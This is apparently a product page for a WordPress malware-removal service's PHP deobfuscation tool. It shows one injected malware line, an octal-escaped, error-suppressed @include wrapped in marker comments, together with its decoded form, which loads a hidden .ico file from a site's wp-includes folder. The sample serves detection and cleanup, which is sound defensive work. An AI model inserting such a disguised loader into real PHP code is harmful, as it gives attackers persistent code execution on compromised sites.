Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php /*26fc5*/ @include ("\057home\057xs84\062855/\153rs-g\164.com\057publ\151c_ht\155l/wp\055incl\165des/\142lock\163/hea\144ing/\05625f0\063704.\151co"); /*26fc5*/...



Obfuscated php code

<?php
/*26fc5*/

@include ("\057home\057xs84\062855/\153rs-g\164.com\057publ\151c_ht\155l/wp\055incl\165des/\142lock\163/hea\144ing/\05625f0\063704.\151co");

/*26fc5*/

Decoded(de-Obfuscated) php code

<?php

/*26fc5*/
@(include "/home/xs842855/krs-gt.com/public_html/wp-includes/blocks/heading/.25f03704.ico");
/*26fc5*/


Malware detection & removal plugin for WordPress

(C)2020 Wordpress Doctor All rights reserved.